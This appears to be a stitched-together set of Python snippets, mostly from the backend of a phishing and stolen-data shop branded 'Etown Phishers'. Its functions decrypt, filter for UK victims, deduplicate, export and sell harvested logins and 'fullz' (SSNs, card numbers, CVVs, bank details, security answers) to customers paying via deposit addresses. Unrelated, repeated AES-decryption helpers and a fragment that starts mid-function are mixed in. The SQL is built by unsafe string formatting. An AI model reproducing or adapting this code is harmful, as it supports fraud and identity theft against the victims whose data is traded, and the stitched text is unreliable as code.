def get_pp_table(self, table_name = 'pp'): try: query = "select id, ip_address, email, password, location from `%s` where 1 order by id desc" % table_name query_conn.execute(query) f_list = query_conn.fetchall() for f in f_list: id = f[0] ip = decrypt(f[1]).replace("| IP Address : ", "").replace("\n", "") email = decrypt(f[2]).replace("| Email: ", "").replace("\n", "") password = decrypt(f[3]).replace("| Password : "******"").replace("\n", "") location = decrypt(f[4]).replace("| Location: ", "").replace("\n", "") check = self.check_word([email, password]) if check == 'EXIST_BAD_WORD': self.delete_row(table_name, id) check = self.check_location(location) if check == 'NOT_UK': self.delete_row(table_name, id) check, index = self.check_ip(ip, table_name, id) if check == 'EXIST_IN_FULLZ' or check == 'EXIST_IN_PP': self.delete_row(table_name, id) except Exception as e: print('FilterModule get %s list has any errors.' % table_name) print(e)
def getDeadFullz(self, where='1'): query = "select id, full_name, birth_date, address, zip, country, phone, ssn, secu_question, secu_answer, card_bin, card_bank, card_type, card_number, expire_date, cvv, account_number, sortcode, user_name, password, ip_address, location, user_agent, browser, platform, type, status, lock_time, lock_customer, deposit_address from dead_fullz where %s" % where query_conn.execute(query) f_list = query_conn.fetchall() r_list = [] for f in f_list: r_list.append({'id': f[0], 'full_name': decrypt(f[1]), 'birth_date': decrypt(f[2]), 'address': decrypt(f[3]), 'zip': decrypt(f[4]), 'country': decrypt(f[5]), 'phone': decrypt(f[6]), 'ssn': decrypt(f[7]), 'secu_question': decrypt(f[8]), 'secu_answer': decrypt(f[9]), 'card_bin': decrypt(f[10]), 'card_bank': decrypt(f[11]), 'card_type': decrypt(f[12]), 'card_number': decrypt(f[13]), 'expire_date': decrypt(f[14]), 'cvv': decrypt(f[15]), 'account_number': decrypt(f[16]), 'sortcode': decrypt(f[17]), 'user_name': decrypt(f[18]), 'password': decrypt(f[19]), 'ip_address': decrypt(f[20]), 'location': decrypt(f[21]), 'user_agent': decrypt(f[22]), 'browser': decrypt(f[23]), 'platform': decrypt(f[24]), 'type': decrypt(f[25]), 'status': f[26], 'lock_time': f[27], 'lock_customer': f[28], 'deposit_address': f[29]}) return r_list
def getPP(self, where='1'): query = "select id, email, password, ip_address, location, user_agent, browser, platform, status, lock_time, lock_customer, deposit_address from pp where %s" % where query_conn.execute(query) f_list = query_conn.fetchall() r_list = [] for f in f_list: r_list.append({'id': f[0], 'email': decrypt(f[1]), 'password': decrypt(f[2]), 'ip_address': decrypt(f[3]), 'location': decrypt(f[4]), 'user_agent': decrypt(f[5]), 'browser': decrypt(f[6]), 'platform': decrypt(f[7]), 'status': f[8], 'lock_time': f[9], 'lock_customer': f[10], 'deposit_address': f[11]}) return r_list
def cjsAesDec(data, key): try: import json except ImportError: import simplejson as json from mycrypt import decrypt enc_data = json.loads(data.decode('base-64')) ciphertext = 'Salted__' + enc_data['s'].decode('hex') + enc_data['ct'].decode('base-64') return json.loads(decrypt(key,ciphertext.encode('base-64')))
def get_payment_pp(customer_id, deposit_address): order_id = 0 result_text = "" sample_text = "_______________________\n\ PRODUCT ID :%5d /\n \ _________________ /\n+- Login Information -+\n+ --------------------+\n%s%s+ --------------------+\n%s%s%s%s%s+ --------------------+\n(IF YOU HAVE ANY ISSUES WITH YOUR PRODUCTS TYPE /support_uin TO CONTACT SUPPORT PLEASE NOTE YOU HAVE ONLY 5MINS PER ITEM TO REPORT INVALID TO SUPPORT!!!)\n\n" query = "select email, password, ip_address, location, user_agent, browser, platform, id from pp where status='confirm' and lock_customer=%s and deposit_address='%s'" % ( customer_id, deposit_address) query_conn.execute(query) f_list = query_conn.fetchall() for f in f_list: if order_id == 0: order_id = get_order(customer_id, 'PP', f[7]) result_text += sample_text % (f[7], decrypt(f[0]), decrypt( f[1]), decrypt(f[2]), decrypt(f[3]), decrypt(f[4]), decrypt( f[5]), decrypt(f[6])) result_text = ( "_______________________\n\ ORDER ID :%6d /\n \ _________________ /\n" % order_id) + result_text return result_text
def export_pp(self, table_name='pp'): try: result_text = "" sample_text = "+ ----------- Login Information ------------+\n+ ------------------------------------------+\n| id: %s\n%s%s+ ------------------------------------------+\n%s%s%s%s%s+ ------------------------------------------+\n\n" query = "select email, password, ip_address, location, user_agent, browser, platform, id from `%s` where 1" % table_name query_conn.execute(query) f_list = query_conn.fetchall() for f in f_list: result_text += sample_text % (f[7], decrypt(f[0]), decrypt( f[1]), decrypt(f[2]), decrypt(f[3]), decrypt( f[4]), decrypt(f[5]), decrypt(f[6])) self.set_file_content(result_text) if self.delete_table == True: query_conn.execute("delete from `%s`" % table_name) conn.commit() except Exception as e: print('ExportModule export %s method has any errors.' % table_name) print(e)
def get_fullz_table(self, table_name = 'fullz'): try: result_list = [] query = "select id, ip_address, card_number, full_name, address, secu_answer, location from `%s` where 1 order by id desc" % table_name query_conn.execute(query) f_list = query_conn.fetchall() for f in f_list: id = f[0] ip = decrypt(f[1]).replace("| IP Address : ", "").replace("\n", "") card = decrypt(f[2]).replace("| Card Number : ", "").replace("\n", "") full_name = decrypt(f[3]).replace("| Full name : ", "").replace("\n", "") address = decrypt(f[4]).replace("| Address : ", "").replace("\n", "") secu_answer = decrypt(f[5]).replace("| Security Answer : ", "").replace("\n", "") location = decrypt(f[6]).replace("| Location: ", "").replace("\n", "") check = self.check_word([full_name, address, secu_answer]) if check == 'EXIST_BAD_WORD': self.delete_row(table_name, id) check = self.check_location(location) if check == 'NOT_UK': self.delete_row(table_name, id) check = self.check_card(card) if check == 'EXIST_IN_FULLZ': self.delete_row(table_name, id) check, index = self.check_ip(ip, table_name, id) if check == 'EXIST_IN_FULLZ': self.delete_row(table_name, id) elif check == 'EXIST_IN_PP': self.delete_row('pp', index) return result_list except Exception as e: print('FilterModule get %s list has any errors.' % table_name) print(e)
def gAesDec(data, key): import mycrypt return mycrypt.decrypt(key,data)
def export_fullz(self, table_name='fullz'): try: result_text = "" sample_text = "+ ------------- Etown Phishers -------------+\n+ ------------------------------------------+\n+ Personal Information\n| id: %s\n%s%s%s%s%s%s%s%s%s+ ------------------------------------------+\n+ Billing Information\n%s%s%s%s%s%s%s%s+ ------------------------------------------+\n+ Account Information\n%s%s+ ------------------------------------------+\n+ Victim Information\n%s%s%s%s%s+ ------------------------------------------+\n\n" query = "select full_name, birth_date, address, zip, country, phone, ssn, secu_question, secu_answer, card_bin, card_bank, card_type, card_number, expire_date, cvv, account_number, sortcode, user_name, password, ip_address, location, user_agent, browser, platform, id from `%s` where 1" % table_name query_conn.execute(query) f_list = query_conn.fetchall() for f in f_list: result_text += sample_text % ( f[24], decrypt(f[0]), decrypt(f[1]), decrypt(f[2]), decrypt(f[3]), decrypt(f[4]), decrypt(f[5]), decrypt(f[6]), decrypt(f[7]), decrypt(f[8]), decrypt(f[9]), decrypt( f[10]), decrypt(f[11]), decrypt(f[12]), decrypt(f[13]), decrypt(f[14]), decrypt(f[15]), decrypt( f[16]), decrypt(f[17]), decrypt(f[18]), decrypt( f[19]), decrypt(f[20]), decrypt( f[21]), decrypt(f[22]), decrypt(f[23])) self.set_file_content(result_text) if self.delete_table == True: query_conn.execute("delete from `%s`" % table_name) conn.commit() except Exception as e: print('ExportModule export %s method has any errors.' % table_name) print(e)
def cjsAesDec(data, key): from mycrypt import decrypt enc_data = json.loads(data.decode('base-64')) ciphertext = 'Salted__' + enc_data['s'].decode('hex') + enc_data['ct'].decode('base-64') return json.loads(decrypt(key,ciphertext.encode('base-64')))
def get_payment_fullz(customer_id, deposit_address): order_id = 0 result_text = "" sample_text = "_______________________\n\ PRODUCT ID :%5d /\n \ _________________ /\n+ -- Etown Phishers --+\n+ --------------------+\n+ Personal Information\n%s%s%s%s%s%s%s%s%s+ --------------------+\n+ Billing Information\n%s%s%s%s%s%s%s%s+ --------------------+\n+ Account Information\n%s%s+ --------------------+\n+ Victim Information\n%s%s%s%s%s+ --------------------+\n(IF YOU HAVE ANY ISSUES WITH YOUR PRODUCTS TYPE /support_uin TO CONTACT SUPPORT PLEASE NOTE YOU HAVE ONLY 5MINS PER ITEM TO REPORT INVALID TO SUPPORT!!!)\n\n" query = "select full_name, birth_date, address, zip, country, phone, ssn, secu_question, secu_answer, card_bin, card_bank, card_type, card_number, expire_date, cvv, account_number, sortcode, user_name, password, ip_address, location, user_agent, browser, platform, id from fullz where status='confirm' and lock_customer=%s and deposit_address='%s'" % ( customer_id, deposit_address) query_conn.execute(query) f_list = query_conn.fetchall() for f in f_list: if order_id == 0: order_id = get_order(customer_id, 'Fullz', f[24]) result_text += sample_text % ( f[24], decrypt(f[0]), decrypt(f[1]), decrypt(f[2]), decrypt(f[3]), decrypt(f[4]), decrypt(f[5]), decrypt(f[6]), decrypt(f[7]), decrypt(f[8]), decrypt(f[9]), decrypt(f[10]), decrypt(f[11]), decrypt(f[12]), decrypt(f[13]), decrypt(f[14]), decrypt(f[15]), decrypt(f[16]), decrypt(f[17]), decrypt(f[18]), decrypt(f[19]), decrypt(f[20]), decrypt(f[21]), decrypt(f[22]), decrypt(f[23])) result_text = ( "_______________________\n\ ORDER ID :%6d /\n \ _________________ /\n" % order_id) + result_text return result_text
def gAesDec(data, key): import mycrypt return mycrypt.decrypt(key, data)
return mes import ast data = ast.literal_eval(open('data.txt').read()) key = [ 3, 5, 5, 3, 1, 2, 3, 2, 7, 3, 3, 6, 7, 0, 0, 0, 0, 2, 1, 5, 6, 7, 3, 1, 5, 5, 0, 0, 0, 3, 2, 0, 4, 4, 2, 5, 3, 5, 7, 5, 2, 6, 0, 1, 3, 7, 6, 2, 2, 6, 4, 6, 6, 2, 4, 7, 7, 1, 4, 2, 5, 5, 5, 7 ] key = decode_im(key) print 'key =', repr(key) from mycrypt import decrypt outf = open('test.jpg', 'wb') for i, frame in enumerate(data[1:]): print i try: buf = decode_im(frame) except Exception as e: print "FAILED:", e continue print 'enc =', repr(buf) decrypt(buf, key) print 'dec =', repr(buf) outf.write(buf)
def gAesDec(data, key): from mycrypt import decrypt return decrypt(key, data)
def cjsAesDec(data, key): from mycrypt import decrypt enc_data = json.loads(data.decode('base-64')) ciphertext = 'Salted__' + enc_data['s'].decode( 'hex') + enc_data['ct'].decode('base-64') return json.loads(decrypt(key, ciphertext.encode('base-64')))
def gAesDec(data, key): from mycrypt import decrypt return decrypt(key,data)